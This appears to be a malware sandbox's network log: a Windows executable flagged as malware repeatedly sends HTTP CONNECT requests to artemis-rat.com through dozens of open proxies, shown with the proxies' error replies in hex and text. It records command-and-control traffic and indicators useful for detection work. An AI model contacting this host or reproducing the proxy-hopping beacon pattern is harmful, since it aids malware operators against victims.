                                              Mar 11, 2024 08:37:23.663631916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.232175112 CET311INHTTP/1.1 400 Bad Request
                                              Server: nginx
                                              Date: Mon, 11 Mar 2024 07:19:52 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1014192.168.2.453024103.204.55.22110807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.496167898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1015192.168.2.4531718.211.4.215807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.496437073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.799182892 CET503INHTTP/1.1 400 Bad Request
                                              Content-Type: text/html; charset=us-ascii
                                              Server: Microsoft-HTTPAPI/2.0
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Connection: close
                                              Content-Length: 324
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 55 52 4c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid URL</h2><hr><p>HTTP Error 400. The request URL is invalid.</p></BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1016192.168.2.45325438.54.6.3990807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.499439001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.718919039 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1017192.168.2.453081103.86.109.38807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.499447107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1018192.168.2.45325238.162.17.5931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.501492977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.913438082 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1019192.168.2.453144190.210.186.241807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.502316952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.846213102 CET444INHTTP/1.1 405 Method Not Allowed
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Server: Apache
                                              Allow: GET,HEAD,POST,OPTIONS,TRACE
                                              Content-Length: 235
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 65 20 55 52 4c 20 2f 69 6e 64 65 78 2e 68 74 6d 6c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for the URL /index.html.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1020192.168.2.45317014.103.24.14880007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.503082037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1021192.168.2.453080103.163.51.254807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.509066105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.918067932 CET343INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.14.0 (Ubuntu)
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 182
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1022192.168.2.453204195.235.124.143807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.518918037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.257106066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.366750956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.366517067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.366585970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.257148027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:37.257060051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:45.072261095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:00.569376945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1023192.168.2.453208159.89.194.121284497284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.533510923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.257148027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.366831064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.570173979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.663582087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1024192.168.2.45334191.231.186.1334437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.535454988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1025192.168.2.45334591.231.186.1334437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.540250063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1026192.168.2.45325920.210.113.3281237284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.602616072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.867089987 CET319INHTTP/1.1 403 Forbidden
                                              Server: squid
                                              Mime-Version: 1.0
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 17
                                              X-Squid-Error: ERR_ACCESS_DENIED 0
                                              X-Cache: MISS from cdn-fintech.info
                                              X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                              Connection: keep-alive
                                              Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                              Data Ascii: ERR_ACCESS_DENIED


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1027192.168.2.453213218.252.244.126807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.603523970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1028192.168.2.453090102.132.201.202807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.604249001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.050409079 CET343INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.14.0 (Ubuntu)
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 182
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                                              Mar 11, 2024 08:37:22.158205986 CET343INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.14.0 (Ubuntu)
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 182
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1029192.168.2.453176116.199.168.141457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.607142925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1030192.168.2.453228131.72.68.164400337284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.607580900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.872570992 CET202INHTTP/1.0 404 Not Found
                                              Content-Length: 724
                                              Content-Type: text/html
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Expires: Mon, 11 Mar 2024 07:37:22 GMT
                                              Server: Mikrotik HttpProxy
                                              Proxy-Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1031192.168.2.453210125.94.219.9690917284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.608195066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.939553022 CET325INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.12.1
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 173
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1032192.168.2.453180115.127.31.6680807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.608196020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1033192.168.2.453272110.12.211.140807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.608196974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.922115088 CET340INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.12.2
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Content-Length: 173
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1034192.168.2.452855117.160.250.163827284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.610346079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.214730024 CET221INHTTP/1.1 403 Access Denied
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Connection: close
                                              Cache-Control: no-store
